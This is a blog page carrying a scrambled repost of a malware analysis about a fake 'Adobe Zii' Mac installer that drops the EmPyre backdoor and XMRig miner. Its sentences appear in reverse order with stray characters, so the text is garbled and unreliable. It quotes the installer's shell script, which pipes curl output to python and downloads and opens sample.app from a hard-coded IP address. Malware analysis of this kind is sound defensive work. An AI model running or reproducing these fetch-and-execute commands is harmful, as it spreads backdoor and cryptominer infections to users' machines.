This script is designed to download and execute a Python script, then download and run an app named sample.app. Opening the fake Adobe Zii app with Automator reveals the nature of the software, as it simply runs a shell script:Ĭurl | python - & s=46.226.108.171:80 curl $s/sample.zip -o sample.zip unzip sample.zip -d sample cd sample cd _MACOSX open -a sample.app (After all, if you're going to write software to help people steal Adobe software, why not steal the logo, too?) The malware installer, however, uses a generic Automator applet icon. In this case, however, the app was called Adobe Zii, but it was definitely not the real thing.Īs can be seen from the above screenshots, the actual Adobe Zii software, on the left, uses the Adobe Creative Cloud logo. Adobe Zii is software that is designed to aid in the piracy of a variety of Adobe applications. The malware was being distributed through an application named Adobe Zii. Earlier this week, we discovered a new piece of Mac malware that is combining two different open-source tools-the EmPyre backdoor and the XMRig cryptominer-for the purpose of evil.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. Archives
June 2023
Categories |